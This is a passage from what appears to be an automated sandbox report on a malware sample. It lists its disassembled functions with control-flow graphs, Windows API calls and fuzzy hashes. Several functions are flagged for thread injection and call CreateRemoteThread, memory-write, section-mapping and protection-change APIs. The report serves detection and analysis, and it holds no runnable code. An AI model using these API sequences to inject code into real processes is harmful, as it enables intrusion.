                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                                                          • Instruction ID: 1e0760eba7ddea2beb580bbbe32f25167dc9049e416f41c20e686c7195a255de
                                                          • Opcode Fuzzy Hash: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                                                          • Instruction Fuzzy Hash: 45128130618E598FDB69EF28E8856A677E1FF99301F50062DE44AC3291EF34EC41CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005265E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 128 5265e4-526653 call 52e53c 132 526659-526674 128->132 133 52672c-526735 128->133 135 52667a-5266bb NtQueryInformationToken 132->135 136 52671e-52671f 132->136 138 526710-526718 NtClose 135->138 139 5266bd-5266e8 NtQueryInformationToken 135->139 136->133 138->136 140 5266ea-5266f9 call 52b7b8 139->140 141 5266fe-526708 139->141 140->141 141->138
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: InformationQueryToken$Close
                                                          • String ID: 0
                                                          • API String ID: 459398573-4108050209
                                                          • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction ID: 11a9e1b2c8b51387fad2660dd01c74371bddf8d7e03977b3350c6f2b06d162b8
                                                          • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                                                          • Instruction Fuzzy Hash: 69311C31218B488FD764EF19D8C8B9ABBE5FBD9301F50492EE58EC3250DB349945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052AA6C Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 188 52aa6c-52aaa4 189 52aaa6-52aab9 188->189 190 52aac8-52aad4 call 52495c 188->190 189->190 194 52aabb-52aac3 189->194 195 52ac25 190->195 196 52aada-52aaea 190->196 203 52ac3a-52ac54 194->203 199 52ac2a-52ac2d 195->199 197 52ab3f-52ab5c 196->197 198 52aaec-52ab1c NtSetInformationProcess 196->198 207 52ab5e-52ab60 197->207 201 52ab30-52ab38 198->201 202 52ab1e-52ab2e call 546e10 198->202 199->203 204 52ac2f-52ac30 199->204 211 52ab3a-52ab3d 201->211 202->211 204->203 207->199 210 52ab66-52ab85 207->210 213 52ab8b-52ab8e 210->213 214 52ac1e-52ac23 210->214 211->197 211->207 213->214 215 52ab94-52abc4 CreateRemoteThread 213->215 214->199 216 52abc6-52abcd 215->216 217 52ac14-52ac1c 215->217 218 52abd9-52abf5 call 52eca8 216->218 219 52abcf-52abd4 call 5471e8 216->219 217->199 224 52ac01 ResumeThread 218->224 225 52abf7-52abff 218->225 219->218 226 52ac07-52ac12 FindCloseChangeNotification 224->226 225->226 226->199
                                                          APIs
                                                          • NtSetInformationProcess.NTDLL ref: 0052AB14
                                                          • CreateRemoteThread.KERNELBASE ref: 0052ABBA
                                                          • FindCloseChangeNotification.KERNELBASE ref: 0052AC0C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
                                                          • String ID:
                                                          • API String ID: 1964589409-0
                                                          • Opcode ID: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                                                          • Instruction ID: 44f7c0f7c389af30284d334a568a3b8f11e2962a210e0e0be5b28e99c1aef110
                                                          • Opcode Fuzzy Hash: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                                                          • Instruction Fuzzy Hash: BD51C831618F158FE728EF68E8996667BE1FF99305F10452DE94AC3291EE34DC41CB42
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052EEF8 Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 52eef8-52ef77 324 52ef79-52efab call 52e53c 321->324 325 52efad-52efae 321->325 327 52efb0-52efb3 324->327 325->327 329 52fb22-52fb3e 327->329 330 52efb9-52efe2 CreateMutexExA 327->330 333 52f000-52f003 330->333 334 52efe4-52efe9 330->334 335 52f009-52f030 333->335 336 52fb1f-52fb20 333->336 337 52efeb-52eff8 334->337 338 52effd-52effe 334->338 341 52f036-52f082 335->341 342 52f0f7-52f0f8 335->342 336->329 337->336 338->333 356 52f084-52f08b 341->356 357 52f099-52f0a9 341->357 343 52f0fa-52f0fd 342->343 343->329 345 52f103-52f144 343->345 348 52f14a-52f150 345->348 349 52f1e8-52f1e9 345->349 352 52f152-52f160 348->352 353 52f1be-52f1e6 call 533bc8 348->353 350 52f1eb-52f1ee 349->350 350->329 355 52f1f4-52f20f GetUserNameA 350->355 358 52f162-52f1aa 352->358 353->350 361 52f240-52f252 355->361 362 52f211-52f22d 355->362 356->357 363 52f08d-52f093 call 54b2cc 356->363 360 52f0af-52f0d8 357->360 364 52f1b6-52f1bc 358->364 365 52f1ac-52f1b0 358->365 373 52f0da-52f0f5 360->373 366 52f254-52f259 361->366 367 52f25b-52f2a4 361->367 362->361 374 52f22f-52f238 362->374 363->357 364->353 364->358 365->364 366->367 371 52f2c6-52f2cb 366->371 383 52f2a6-52f2af 367->383 384 52f2b7-52f2b8 367->384 375 52f30d-52f310 371->375 376 52f2cd-52f2ee 371->376 373->343 374->361 378 52f312-52f322 call 52b7b8 375->378 379 52f327-52f35e 375->379 392 52f302-52f30a 376->392 393 52f2f0-52f2f7 376->393 378->379 386 52f360-52f380 379->386 387 52f3c1 379->387 395 52f3e4-52f3f0 383->395 396 52f2b5 383->396 391 52f2c0 384->391 403 52f386-52f3a4 call 52ccc8 386->403 389 52f3c6-52f3c9 387->389 389->329 394 52f3cf-52f3d2 389->394 391->371 392->375 393->392 398 52f2f9-52f300 393->398 399 52f3d4 call 53b4b0 394->399 400 52f3db-52f3de 394->400 401 52f3f2-52f423 call 54ba3c 395->401 402 52f46a-52f47c call 549604 395->402 396->391 398->375 409 52f3d9 399->409 400->329 400->395 401->402 414 52f425-52f42d 401->414 412 52f4b6-52f4c8 call 5498a8 402->412 413 52f47e-52f4af call 54ba3c 402->413 415 52f3b3 403->415 416 52f3a6-52f3af 403->416 409->400 424 52f4d0-52f517 call 53d43c call 53ac88 412->424 413->424 425 52f4b1-52f4b2 413->425 414->402 420 52f42f-52f464 call 53ef6c 414->420 417 52f3b8-52f3bf 415->417 416->403 421 52f3b1 416->421 417->389 420->402 421->417 433 52f540-52f543 call 54b4d0 424->433 434 52f519-52f538 424->434 425->412 437 52f548-52f54d 433->437 434->433 437->329 438 52f553-52f56c 437->438 438->329 440 52f572-52f59a 438->440 442 52f5c0-52f5ea call 5426bc 440->442 443 52f59c-52f5b1 440->443 448 52f5f9-52f608 442->448 449 52f5ec-52f5f4 442->449 443->442 447 52f5b3-52f5bb 443->447 447->329 450 52f8d1-52f8d8 448->450 451 52f60e-52f644 call 533bc8 448->451 449->329 453 52fa60-52fa69 450->453 454 52f8de-52f902 call 547004 450->454 471 52f651-52f654 451->471 472 52f646-52f64d 451->472 453->336 456 52fa6f-52fa74 453->456 463 52f9a5-52f9c6 call 547004 454->463 464 52f908-52f928 call 548678 454->464 459 52fae6-52fb14 call 5426bc 456->459 460 52fa76-52fa79 456->460 459->449 475 52fb1a-52fb1c 459->475 465 52fa8b-52faa8 460->465 466 52fa7b-52fa85 460->466 463->453 481 52f9cc-52f9e9 call 548678 463->481 464->463 482 52f92a-52f937 464->482 465->459 479 52faaa-52fadc 465->479 466->465 471->329 474 52f65a-52f727 call 546b44 * 4 471->474 472->471 506 52f795-52f798 474->506 507 52f729-52f730 474->507 475->336 479->459 481->453 490 52f9eb-52f9f8 481->490 485 52f993-52f99d 482->485 486 52f939-52f97e call 540c58 call 5448d4 482->486 485->463 486->485 505 52f980-52f98e call 53f5d8 486->505 493 52f9fa-52fa40 call 540c58 call 5448d4 490->493 494 52fa4e-52fa58 490->494 493->494 515 52fa42-52fa49 call 53b24c 493->515 494->453 505->485 506->329 510 52f79e-52f7a5 506->510 507->506 511 52f732-52f74d 507->511 513 52f7a7-52f7b6 510->513 514 52f7bc-52f7db 510->514 519 52f757-52f783 call 5426bc 511->519 520 52f74f-52f755 511->520 513->514 522 52f81b-52f85b 514->522 523 52f7dd-52f816 call 52fe20 514->523 515->494 519->506 529 52f785-52f78b 519->529 527 52f793 520->527 530 52f89e-52f8a4 522->530 531 52f85d-52f87a call 5426bc 522->531 523->522 527->506 529->527 538 52f8a6-52f8a9 530->538 536 52f883-52f89c 531->536 537 52f87c-52f881 531->537 536->538 537->538 538->329 539 52f8af-52f8ba 538->539 539->453 540 52f8c0-52f8cc call 526274 539->540 540->453
                                                          APIs
                                                          • CreateMutexExA.KERNEL32 ref: 0052EFC5
                                                          • GetUserNameA.ADVAPI32 ref: 0052F1FE
                                                            • Part of subcall function 005426BC: CreateThread.KERNELBASE ref: 005426EC
                                                            • Part of subcall function 005426BC: QueueUserAPC.KERNELBASE ref: 00542703
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateUser$MutexNameQueueThread
                                                          • String ID:
                                                          • API String ID: 2503873790-0
                                                          • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction ID: 1cd9619045f40465fb4f42ec7c93818d7efb85d558fab21d61f2fae36d3f6c38
                                                          • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                                                          • Instruction Fuzzy Hash: BA72A375619A188FE728EF28FC8956977E1F799700B20853ED44BC32A1DE38D947CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0053583C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 597 53583c-53587e 599 535884-5358c7 597->599 600 535a4f 597->600 604 535a3b-535a4d 599->604 605 5358cd-5358ec 599->605 601 535a54-535a77 600->601 604->601 605->604 608 5358f2-535911 605->608 608->604 610 535917-535936 608->610 610->604 612 53593c-53595b 610->612 612->604 614 535961-5359e3 call 52e53c NtCreateSection 612->614 617 5359e5-535a02 call 5341d8 614->617 618 535a2a-535a2f 614->618 622 535a20-535a28 617->622 623 535a04-535a1e call 52e53c 617->623 624 535a31-535a33 618->624 622->624 623->624 624->604 626 535a35-535a39 624->626 626->601
                                                          APIs
                                                          • NtCreateSection.NTDLL ref: 005359DE
                                                            • Part of subcall function 005341D8: NtMapViewOfSection.NTDLL ref: 00534224
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: Section$CreateView
                                                          • String ID: 0
                                                          • API String ID: 1585966358-4108050209
                                                          • Opcode ID: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                                                          • Instruction ID: 7889b315d99e4ff8b6a48d751e1c6bd41b59552ac755a40316e904b70a055ed6
                                                          • Opcode Fuzzy Hash: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                                                          • Instruction Fuzzy Hash: 3461B37021CF098FDB54EF68D8C9A6577E1FB99305F104A6EE84AC7261EB34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005404CC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 629 5404cc-5404e0 630 540526-54052e 629->630 631 5404e2-54050d NtAllocateVirtualMemory 629->631 632 540521-540522 631->632 633 54050f-54051f 631->633 632->630 633->630
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL ref: 00540509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID: @
                                                          • API String ID: 2167126740-2766056989
                                                          • Opcode ID: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                                                          • Instruction ID: 99fe9aec71cd83b8d5168b7adbd617200fa4afedc4c1c7fa7cc6286c25d66a76
                                                          • Opcode Fuzzy Hash: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                                                          • Instruction Fuzzy Hash: 17F09070614A048BDB489FF8D8CC6BA7BE0FB9C305F50096DE20ACB294DB78C9048B45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0055F002 Relevance: 3.3, APIs: 2, Instructions: 337nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 636 55f002-55f063 638 55f33d-55f355 636->638 639 55f069-55f082 636->639 646 55f358-55f36a 638->646 640 55f237-55f282 NtProtectVirtualMemory 639->640 641 55f088-55f091 639->641 642 55f31c-55f31e 640->642 643 55f288-55f289 640->643 641->640 644 55f097-55f09f 641->644 642->646 649 55f320-55f33b 642->649 647 55f28d-55f28f 643->647 648 55f0a2-55f0ae 644->648 647->646 650 55f295-55f299 647->650 651 55f0b0-55f0b1 648->651 652 55f0cc-55f0fa 648->652 649->646 653 55f2b1-55f2b5 650->653 654 55f29b-55f2af 650->654 655 55f0b3-55f0ca 651->655 661 55f100-55f111 652->661 662 55f228-55f229 652->662 658 55f2b7-55f2cb 653->658 659 55f2cd-55f2ce 653->659 657 55f2d0-55f316 NtProtectVirtualMemory 654->657 655->652 655->655 657->642 657->647 658->657 659->657 663 55f113-55f118 661->663 664 55f11e-55f13a 661->664 665 55f22e-55f231 662->665 663->664 666 55f204-55f205 663->666 667 55f140-55f17e 664->667 668 55f20c-55f220 664->668 665->640 665->646 666->668 672 55f1a7-55f1c3 667->672 673 55f180-55f188 667->673 668->648 669 55f226 668->669 669->665 677 55f1c5 672->677 678 55f1c8-55f1ca 672->678 674 55f193-55f1a4 673->674 675 55f18a-55f191 673->675 674->672 675->674 675->675 677->678 679 55f1cc-55f1ee 678->679 680 55f1fe-55f1ff 678->680 679->668 681 55f1f0-55f1f9 679->681 680->666 681->667
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL ref: 0055F27A
                                                          • NtProtectVirtualMemory.NTDLL ref: 0055F309
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.471575399.000000000055F000.00000040.80000000.00040000.00000000.sdmp, Offset: 0055F000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_55f000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: f1dedb5b21cf42e558672d1ecf6caf272f67ae8676b0b0c27b8776a1df3852d2
                                                          • Instruction ID: 69509d829802f1d1ac61ba5942002552770146c3e93c5185859a29c79acc0114
                                                          • Opcode Fuzzy Hash: f1dedb5b21cf42e558672d1ecf6caf272f67ae8676b0b0c27b8776a1df3852d2
                                                          • Instruction Fuzzy Hash: 06A1053120CB884FC725DF28DC956AABBE1FB95311F58497FD8CBC7252D634A84A8742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052B11C Relevance: 3.2, APIs: 2, Instructions: 183memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 714 52b11c-52b153 RtlAllocateHeap 715 52b2e6-52b300 714->715 716 52b159-52b199 call 52e53c NtQueryInformationProcess 714->716 719 52b2d4-52b2de 716->719 720 52b19f-52b1c9 call 5240c0 716->720 719->715 720->719 723 52b1cf-52b1da 720->723 723->719 724 52b1e0-52b203 call 5240c0 723->724 724->719 727 52b209-52b230 call 5240c0 724->727 727->719 730 52b236-52b25c 727->730 730->719 731 52b25e-52b262 730->731 731->719 732 52b264-52b28b call 5240c0 731->732 732->719 735 52b28d-52b294 732->735 736 52b296-52b297 735->736 737 52b29b-52b29e 735->737 736->737 737->719 738 52b2a0-52b2c0 call 5240c0 737->738 738->719 741 52b2c2-52b2c4 738->741 742 52b2c6-52b2c8 741->742 743 52b2ca-52b2cb 741->743 744 52b2cd-52b2d1 742->744 743->744 744->719
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0052B147
                                                          • NtQueryInformationProcess.NTDLL ref: 0052B191
                                                            • Part of subcall function 005240C0: NtReadVirtualMemory.NTDLL ref: 005240DF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 886377554-0
                                                          • Opcode ID: bb52a1fff10a7dd98ec3da78456525eea07a30f3c88382e4ce150ea65ee021ba
                                                          • Instruction ID: 8ca625b908815d97298a255a51425885fd1815f9790377637936e499b3295c25
                                                          • Opcode Fuzzy Hash: bb52a1fff10a7dd98ec3da78456525eea07a30f3c88382e4ce150ea65ee021ba
                                                          • Instruction Fuzzy Hash: 6B51933121CB598BEB19EB28E8957AA77E5FFD9301F04452EA84DC3285DF34D941CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052B4B8 Relevance: 1.8, APIs: 1, Instructions: 292memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction ID: 52793fad069a9e477cc90b44ee751153eee04448226f2113667cfa1359fa7980
                                                          • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                                                          • Instruction Fuzzy Hash: E1819630718B198FF768EF28E89976A37E5FB95311F24452DD44AC32A1EF74E8428741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0054A148 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL ref: 0054A16E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction ID: 20df7d3ea60cee5c3a944c090a35ad79f087f96151b905a15d5305a0ddd49d60
                                                          • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                                                          • Instruction Fuzzy Hash: 90018130358E0D8FDBC4EF68D5C4BA6B7E4FBA8309B40156EA40AC3168D734D881CB02
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005341D8 Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: SectionView
                                                          • String ID:
                                                          • API String ID: 1323581903-0
                                                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction ID: 4c5ee55db34c3be9391e4a6ac9338d2aaae18f89219d58e681fafe4f41504c68
                                                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                          • Instruction Fuzzy Hash: 7C01D2B0A08B048FCB48EF69D0C8569BBE1FB98311F50066FE949CB796DB70D885CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005240C0 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryReadVirtual
                                                          • String ID:
                                                          • API String ID: 2834387570-0
                                                          • Opcode ID: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                                                          • Instruction ID: 4fe34f220971d8781f256ebe602b50afa4ee38f1b152eaa3c3df8410c0e582f6
                                                          • Opcode Fuzzy Hash: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                                                          • Instruction Fuzzy Hash: FAE0D8347157804BE7005BB49CCD63D37D4FB89305F104839ED41CB360C62EC8908701
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00526D24 Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL ref: 00526D43
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                                                          • Instruction ID: 241d8a2e39fabec06b0b503b682e62caa0d29b409ac5811ade0d391f56798a30
                                                          • Opcode Fuzzy Hash: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                                                          • Instruction Fuzzy Hash: C9E0D8347156484BDB10AFB498CC23877D0FB88301F10083AE545C3364C629C8854742
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0052ECA8 Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 144 52eca8-52ed1b call 52e53c call 52495c 149 52ed43-52ed4e 144->149 150 52ed1d-52ed3d call 529660 144->150 152 52ed50-52ed56 call 52b11c 149->152 153 52ed5e-52ed80 call 5240c0 149->153 150->149 157 52eec7-52eecb 150->157 158 52ed5b-52ed5c 152->158 162 52ed86-52ed8c 153->162 163 52eebf-52eec5 153->163 160 52eed7-52eef4 157->160 161 52eecd-52eece 157->161 158->153 161->160 164 52ed92-52edb7 VirtualProtectEx 162->164 165 52eeb8-52eebd 162->165 163->157 167 52edd3 164->167 168 52edb9-52edd1 call 524a48 164->168 165->157 169 52edd5-52edd7 167->169 168->169 169->163 171 52eddd-52ede3 169->171 173 52ede8-52ee22 ResumeThread SuspendThread 171->173 175 52ee37-52ee39 173->175 176 52ee24-52ee2f 173->176 177 52ee45-52ee4d 175->177 178 52ee3b-52ee43 175->178 176->175 180 52ee56-52ee6d call 529660 177->180 181 52ee4f-52ee54 177->181 178->173 178->177 182 52ee6f-52ee9c VirtualProtectEx 180->182 181->182 182->157 184 52ee9e-52eeb6 call 524a48 182->184 184->157
                                                          APIs
                                                            • Part of subcall function 0052495C: FindCloseChangeNotification.KERNELBASE ref: 00524A08
                                                          • VirtualProtectEx.KERNELBASE ref: 0052EDAF
                                                          • ResumeThread.KERNELBASE ref: 0052EDEC
                                                          • SuspendThread.KERNELBASE ref: 0052EE0F
                                                          • VirtualProtectEx.KERNELBASE ref: 0052EE8C
                                                            • Part of subcall function 00524A48: VirtualProtectEx.KERNELBASE ref: 00524A9C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
                                                          • String ID:
                                                          • API String ID: 4107391026-0
                                                          • Opcode ID: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                                                          • Instruction ID: 87c7a3aa39c0bc72ac2808ad44c639516c18c05ec2737548700b5c21d6c146f7
                                                          • Opcode Fuzzy Hash: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                                                          • Instruction Fuzzy Hash: 2261C03161CA588FD768EF28E8867AA77D5FB9A301F10052DE58FC3281DF34D9468B46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005225C0 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 228 5225c0-5225ea call 54c930 231 5225f0-522607 call 54887c 228->231 232 522705-52271c 228->232 235 5226f1-5226fd 231->235 236 52260d-522622 231->236 235->232 237 522626-52262a 236->237 238 522648-522655 237->238 239 52262c-522646 237->239 238->235 240 52265b 238->240 239->238 241 52265d-522668 239->241 240->237 241->235 242 52266e-5226a1 CreateFileA 241->242 242->235 243 5226a3-5226b6 SetFilePointer 242->243 244 5226e8-5226eb FindCloseChangeNotification 243->244 245 5226b8-5226d8 ReadFile 243->245 244->235 245->244 246 5226da-5226df 245->246 246->244 247 5226e1-5226e6 246->247 247->244
                                                          APIs
                                                          • CreateFileA.KERNELBASE ref: 00522694
                                                          • SetFilePointer.KERNELBASE ref: 005226AE
                                                          • ReadFile.KERNELBASE ref: 005226D0
                                                          • FindCloseChangeNotification.KERNELBASE ref: 005226EB
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.470777747.0000000000521000.00000020.80000000.00040000.00000000.sdmp, Offset: 00521000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_24_2_521000_control.jbxd
                                                          Similarity
                                                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                          • String ID:
                                                          • API String ID: 2405668454-0
                                                          • Opcode ID: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                                                          • Instruction ID: 9737cc85895aebceeca4a80b63360593c386289c4a570148f839882ee261bb4c
                                                          • Opcode Fuzzy Hash: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                                                          • Instruction Fuzzy Hash: FF41D935218A084FDB58DF68E8C8A2977E1FB99315F24466EE09BC32A1DE35D843CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00521930 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
